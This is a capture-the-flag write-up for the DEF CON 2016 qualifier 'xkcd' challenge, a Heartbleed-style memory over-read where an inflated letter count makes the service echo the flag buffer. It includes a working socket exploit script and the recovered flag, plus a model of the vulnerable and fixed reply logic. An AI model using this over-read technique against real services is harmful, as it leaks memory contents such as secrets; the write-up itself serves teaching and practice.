Laboratory: DEF CON CTF Quals 2016 - xkcd [1]

delimitry, 23 May 2016

http://download.quals.shallweplayaga.me/be4bf26fcb93f9ab8aa193efaad31c3b/xkcd
xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me:1354

Might want to read that comic as well... 1354

We have a binary and a service running this binary.
A quick inspection turned up a reference to the xkcd comic that explains Heartbleed.

Our input data is stored in a global buffer (in the .bss segment) that is 512 bytes long.
The flag buffer (holding the contents of the flag file) is located immediately after that buffer.

So we can send 512 bytes of input to fill the global buffer completely, so that our data sits right next to the flag buffer.
Then we claim a length (the letter count) of 512 + the length of the flag, and the service echoes that many bytes back.
I determined the length of the flag empirically. Here is the final exploit:

import socket

s = socket.socket()
s.settimeout(5)
address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me'
port = 1354
s.connect((address, port))
# 512 'A's fill the global buffer; the claimed letter count of 512 + 29
# makes the service echo past it into the adjacent flag buffer.
payload = 'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%s LETTERS)\n' % ('A' * 512, 512 + 29)
print(payload)
s.sendall(payload.encode())
data = s.recv(2048)
print(data.decode(errors='replace'))
s.close()

That returned the flag successfully.
The flag is: bl33ding h34rt5
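To make the over-read concrete, here is an added model of the service (written for this writeup, not code from the challenge binary): a 512-byte global buffer followed directly by the flag buffer, one reply routine that trusts the client's letter count, and one with the bounds check the challenge lacks. The layout, the function names and the flag value are assumptions for illustration only.

```python
import re

GLOBALS_SIZE = 512                   # size of the global buffer in .bss
FLAG = b"flag{constructed-sample}"   # constructed stand-in for the flag file

# Request format as used in the writeup: REPLY "<text>" (<count> LETTERS)
REQUEST = re.compile(rb'REPLY "(.*)" \((\d+) LETTERS\)', re.S)

def build_request(text: bytes, count: int) -> bytes:
    """Build a request line in the format the service expects."""
    return (b'SERVER, ARE YOU STILL THERE? IF SO, REPLY "' + text
            + b'" (' + str(count).encode() + b' LETTERS)\n')

def parse_request(request: bytes):
    """Return (quoted text, claimed letter count), or None if malformed."""
    m = REQUEST.search(request)
    if not m:
        return None
    return m.group(1), int(m.group(2))

def build_memory(text: bytes) -> bytearray:
    """Model of the layout: the global buffer, then the flag right after it.
    At most GLOBALS_SIZE bytes of input are stored; the rest stays zeroed."""
    mem = bytearray(GLOBALS_SIZE) + FLAG
    data = text[:GLOBALS_SIZE]
    mem[:len(data)] = data
    return mem

def vulnerable_reply(request: bytes) -> bytes:
    """Echo `count` bytes from the global buffer, trusting the client's count.
    A count larger than the stored input reads on into the flag buffer."""
    parsed = parse_request(request)
    if parsed is None:
        return b""
    text, count = parsed
    return bytes(build_memory(text)[:count])

def fixed_reply(request: bytes) -> bytes:
    """Same service with the missing check: the claimed count may not exceed
    the bytes actually stored, otherwise the request is silently discarded."""
    parsed = parse_request(request)
    if parsed is None:
        return b""
    text, count = parsed
    if count > min(len(text), GLOBALS_SIZE):
        return b""
    return bytes(build_memory(text)[:count])
```

With the request from the writeup (512 'A's, count 512 + 29), `vulnerable_reply` returns the filler followed by the whole flag, while `fixed_reply` returns nothing.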